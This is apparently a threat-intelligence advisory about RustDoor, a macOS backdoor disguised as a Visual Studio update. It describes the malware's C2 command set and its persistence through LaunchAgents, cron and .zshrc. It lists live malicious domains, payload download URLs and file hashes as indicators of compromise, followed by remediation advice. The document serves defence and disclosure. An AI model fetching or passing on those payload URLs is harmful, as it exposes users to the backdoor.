Rewterz Threat Alert – New RustDoor MacOS Malware Linked to ALPHV/BlackCat Ransomware Gang Impersonates Visual Studio Update – Active IOCs

Severity

High

Analysis Summary

A novel Rust-based malware made to target macOS users is being distributed posing as a Visual Studio update and providing backdoor access to infected devices. It has been noted to utilize infrastructure linked to the well-known ALPHV/BlackCat ransomware gang. The campaign was first observed in November 2023 and is still ongoing to spread newer variants of the malware.

Since RustDoor is written in Rust, it is capable of running on Intel-based (x86_64) and ARM (Apple Silicon) architectures. Cybersecurity researchers discovered while analyzing the malware that it communicated with at least four command-and-control (C2) servers. Threat intelligence data showed that three of these C2 servers were previously used in ransomware attacks from an ALPHV/BlackCat affiliate. However, this evidence is not enough to fully link the use of RustDoor by a particular threat actor. It has recently become common for threat actors to use the same servers for attacks due to having less freedom in choosing their infrastructure for performing illegal activity.

RustDoor is propagated primarily as a Visual Studio for Mac updater, which is Microsoft’s integrated development environment (IDE) for the macOS platform announced to be discontinued on August 31^st, 2024. The backdoor malware is distributed under many names, such as ‘VisualStudioUpdater’, ‘VisualStudioUpdater_Patch’, ‘VisualStudioUpdating’, ‘zshrc2’, ‘Previewers’, ‘DO_NOT_RUN_ChromeUpdates’, and ‘visualstudioupdate’. According to security analysts, the malware has been actively distributed while going undetected for at least three months.

There are at least three versions of the malware discovered so far that are distributed as FAT binaries, including Mach-O files for x86_64 Intel and ARM architectures but don’t come in typical parent files like Disk Images or Application Bundles. It is believed that this unique way of distribution reduces the campaign’s digital footprint and makes it unlikely for security products to flag the malware as suspicious.

The backdoor provides many capabilities such as commands to control the infected device and exfiltrate data. This way, it can achieve persistence in the system by modifying the files. Once a system is compromised, the malware connects to the command-and-control (C2) servers by utilizing specific endpoints for registration, task execution, and data exfiltration. The commands that are supported by RustDoor are as follows:

• ps: Lists running processes.
• shell: Executes arbitrary shell commands.
• cd: Changes the current directory to navigate through the file system.
• mkdir: Creates a new directory.
• rm: Deletes files.
• rmdir: Deletes directories.
• sleep: Pauses execution for a set time.
• upload: Sends files to a remote server.
• botkill: Terminates other malware processes.
• dialog: Displays prompts or messages to the user.
• taskkill: Ends specified processes.
• download: Retrieves files from a remote server.

The malware leverages LaunchAgents and Cron jobs for scheduling its execution at certain times or when the user logs in to make sure it survives system reboots. It also modifies the ~/.zshrc file to execute in new terminal sessions or add it to the Dock using system commands, helping it to blend in with legitimate user activities and applications. The latest variant of the backdoor was first seen on November 30 and contains a complex JSON configuration and an embedded Apple script that is used for exfiltrating files with particular extensions.

Impact

• Data Exfiltration
• Unauthorized Access
• Exposure to Sensitive Data

Indicators of Compromise

Domain Name

• maconlineoffice.com
• serviceicloud.com

MD5

• 6dd3a3e4951d34446fe1a5c7cdf39754
• 90a517c3dab8ceccf5f1a4c0f4932b1f
• b67bba781e5cf006bd170a0850a9f2d0
• f5774aca722e0624daf67a2da5ec6967
• 52a9d67745f153465fac434546007d3a
• 30b27b765878385161ca1ee71726a5c6
• 1dbc26447c1eaa9076e65285c92f7859
• 05a8583f36599b5bc93fa3c349e89434
• 5d0c62da036bbe375cb10659de1929e3
• 68e0facbf541a2c014301346682ef9ca
• b2bdd1d32983c35b3b1520d83d89d197
• 5fcc12eaba8185f9d0ddecafae8fd2d1

SHA-256

• 5763ab1ccadc2724d6ec728926eb4dc574a6005a8456a65035dee5edb3cc2a0a
• a9d299edf6b3bc1c98185e1c22ba7326f3ad6cba73ca00565330d5c3da50e02c
• fe565f4296570a89893828cdd61c6421cf745bab220e21cebce226863d5772a0
• d505835c635e8ee29297ca628330b805965439ddc14d50a19bc088b5c123149b
• 20b986b24d86d9a06746bdb0c25e21a24cb477acb36e7427a8c465c08d51c1e4
• 00b66c1e7e483da6cbcc0d94f01b9fca245fb052ef8e958e21abcb0880aff37f
• b0665afbd99baf586899abae457f702962503afb855f4bda58cf070ca1c69956
• 238b546e2a1afc230f88b98dce1be6bf442b0b807e364106c0b28fe18db2ce66
• c93feb701e04cac4c6ed805d529378351e500ca1178958862d9e24c9f8723518
• 4a59e2fe11ed9136d96a985448b34957ee5861adc9c1a52de4ad65880875dfdb
• 11c998005bcce297b6a0595b97281aca7a587b6bc1e6aa414609812108b3328c
• e96c13667bccd6c6c38d9797b15642bfea19080f9bc90d944e7ae6abfb4c64be

SHA-1

• 8970611cec85ce5060bbebae7f7335182ea118a7
• 6b8f843971a737b9b34f749e5085f47d47500a8a
• 7f924db0548baa7c9c618144ffc5d65b7395ac69
• b0d780b3de916557fe2882da26e916e181c9fbfb
• 2c53c68efb7e4101ffc44ed160aabeae8ad37075
• 4e36a7c89787bdafbccc01a97f457c290713de2e
• 2c5ad9c37b2208ba823c35a26f5f7eef70c23dbe
• 6e13dd62d9aded5c192366dc434e5f6f95f2f748
• 80811b9d9c0ba3bb006bf32718ee6c073a5714ef
• b0577711e9c98827a39651508745d508ec027a09
• 61f68a6fa3daaec3f43e2f210884f69c15f458b1
• 01a7901f5b333de0ae90eb249cb3ab3012c63d04

URL

• https://sarkerrentacars.com/zshrc
• https://turkishfurniture.blog/Previewers
• http://linksammosupply.com/zshrc2
• http://linksammosupply.com/VisualStudioUpdaterLs2
• http://linksammosupply.com/VisualStudioUpdater

Remediation

• Block all threat indicators at your respective controls.
• Search for Indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Be vigilant when downloading software and double-check the URL to see if it is legitimate.
• Never download software from untrusted sources.
• Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
• Enable antivirus and anti-malware software and update signature definitions on time. Using multi-layered protection is necessary to secure vulnerable assets.
• Along with network and system hardening, code hardening should be implemented within the organization so that their websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed codes.
• Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
• Patch and upgrade any platforms and software timely and make it into a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.
• Develop and regularly update an incident response plan that outlines the steps to take in case of a security breach. Test the plan through simulations to ensure its effectiveness